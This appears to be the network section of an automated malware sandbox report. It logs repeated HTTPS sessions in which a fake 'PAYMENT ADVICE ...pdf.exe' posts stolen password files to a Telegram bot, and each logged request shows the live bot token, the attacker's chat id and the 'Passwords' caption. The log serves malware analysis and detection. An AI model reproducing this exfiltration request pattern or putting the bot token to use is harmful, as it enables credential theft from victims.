                                                                                                              2024-12-19 14:29:19 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19623,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618559,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.449805149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:22 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd20ea6ea465de
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:22 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 65 61 36 65 61 34 36 35 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd20ea6ea465deContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:22 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:22 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:22 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19625,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618562,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.449812149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:25 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd2114582b3447
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 31 34 35 38 32 62 33 34 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd2114582b3447Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:26 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:26 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:26 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19627,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618566,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.449823149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:29 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd213f5a12c2d3
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 33 66 35 61 31 32 63 32 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd213f5a12c2d3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:29 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:29 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:29 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19629,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618569,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.449833149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:33 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd2170c0ee4899
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 37 30 63 30 65 65 34 38 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd2170c0ee4899Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:34 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:33 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:34 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19631,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618573,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.449842149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:36 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd219b3121eb6e
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 39 62 33 31 32 31 65 62 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd219b3121eb6eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:37 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:37 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:37 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19633,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618577,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.449852149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:40 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd21c40a77b2f8
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 63 34 30 61 37 37 62 32 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd21c40a77b2f8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:40 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:40 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:40 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19635,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618580,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.449861149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:43 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd21f0932bd731
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 66 30 39 33 32 62 64 37 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd21f0932bd731Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:44 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:44 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
